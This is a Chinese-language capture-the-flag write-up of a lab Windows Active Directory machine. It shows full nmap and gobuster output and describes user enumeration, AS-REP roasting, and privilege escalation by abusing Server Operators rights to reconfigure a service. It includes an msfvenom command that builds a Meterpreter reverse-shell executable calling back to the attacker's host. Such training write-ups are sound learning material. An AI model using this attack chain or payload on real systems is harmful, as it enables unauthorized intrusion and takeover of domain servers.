Skip to main content

Services

端口扫描

root@ip-10-10-143-156:~/services# nmap -sTCV -p- --min-rate 1000 10.10.229.149

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-08 09:40 BST
Nmap scan report for ip-10-10-229-149.eu-west-1.compute.internal (10.10.229.149)
Host is up (0.00034s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Above Services
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-08 08:41:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: services.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: services.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-SERVICES.services.local
| Not valid before: 2023-10-07T08:31:45
|_Not valid after:  2024-04-07T08:31:45
|_ssl-date: 2023-10-08T08:41:55+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
57359/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 02:F0:28:51:82:83 (Unknown)
Service Info: Host: WIN-SERVICES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-SERVICES, NetBIOS user: <unknown>, NetBIOS MAC: 02:f0:28:51:82:83 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-10-08 09:41:55
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

80

root@ip-10-10-143-156:~/services# gobuster dir -u http://10.10.229.149/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,asp,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.229.149/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,asp,txt
[+] Timeout:        10s
===============================================================
2023/10/08 09:46:32 Starting gobuster
===============================================================
/index.html (Status: 200)
/about.html (Status: 200)
/img (Status: 301)
/contact.html (Status: 200)
/css (Status: 301)
/About.html (Status: 200)
/Contact.html (Status: 200)
/Index.html (Status: 200)
/courses.html (Status: 200)
/pricing.html (Status: 200)
/portfolio.html (Status: 200)
/js (Status: 301)
/fonts (Status: 301)
/IMG (Status: 301)
/INDEX.html (Status: 200)
/Courses.html (Status: 200)
/Fonts (Status: 301)
/CSS (Status: 301)
/Img (Status: 301)
/JS (Status: 301)
/Pricing.html (Status: 200)
/Portfolio.html (Status: 200)
/CONTACT.html (Status: 200)
/COURSES.html (Status: 200)
/ABOUT.html (Status: 200)
===============================================================
2023/10/08 09:48:34 Finished
===============================================================

从目录扫描中我并没有获取到任何有效的内容, 接着我开始了查找网页内容, 在网页的下方我发现了一个邮箱

image-20240709191947442

同时在查看网站上标注的内部员工时我发现

  • 这里的 Joanne Doe 好像对的就是我们上面的邮箱
  • 如果上一个判断正确, 那么下一步我们就可以创建出所有用户的内部名称

image-20240709191953890

88

在获取到用户的内部名称以及域名后我开始了 kerberos 的利用

  1. 我对发现的用户进行了验证,发现用户全部正确

    image-20240709192002589

  2. 我尝试里 AS-REP 攻击, 获取到其中一个用户的 Session key

    image-20240709192009795

  3. 进行解密

    image-20240709192016588

本来我还计划 SPN 打一下, 但是没消息所以就放弃了直接尝试登陆

后渗透

j.rock

image-20240709192034501

j.rock —> administrators

image-20240709192045861

从上面发现用户 j.rock 属于一个特殊的用户组 Server Operators ,

image-20240709192057920

因此我便开始查找相关的利用文章 Windows Privilege Escalation: Server Operator Group - Hacking Articles 使用 services 命令我们可以列出所有的服务

image-20240709192108002

我们在这里使用 cfn-hup 服务进行操作

  1. 生成我们的木马程序

    root@ip-10-10-143-156:~/services# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.143.156 LPORT=4444 -f exe > admin.exe

  2. 进行上传并修改 cfn-hup 的配置,

    image-20240709192115327

  3. 然后我们就可以得到一个 Shell

    image-20240709192120525